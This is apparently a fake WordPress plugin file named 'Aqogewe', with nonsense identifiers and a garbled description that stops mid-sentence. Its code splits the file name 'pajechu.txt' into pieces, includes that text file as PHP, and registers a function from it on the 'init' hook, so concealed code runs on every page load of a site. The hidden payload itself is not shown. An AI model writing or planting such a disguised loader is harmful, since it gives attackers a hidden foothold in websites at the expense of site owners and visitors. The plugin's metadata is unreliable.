<?php

/**
 * Plugin Name: Aqogewe
 * Plugin URI: https://dommot178.com/aqogewe
 * Description: In non-English and state sales tax, 89 municipalities collect a
 * Version: 1.13.12
 * Author: Jeffrey Mac
 * Author URI: https://dommot178.com
 * Text Domain: aqogewe
 * License: GPL2+
 *
 */

function zumyla_aqykhukhyqy() {
    otuwot_tebedumix();
}

$qihalih = __DIR__ . '/pajechu.txt';
if (file_exists($qihalih)) {
    include_once __DIR__ . "/paj" . "echu." . "txt";
}


if (function_exists("otuwot_tebedumix")) {
    $habeme = new nuvaco_zhuzhychipy();
    if ($habeme->ucudor_eshuzeli()) {
        add_action('init', 'zumyla_aqykhukhyqy');
    }
}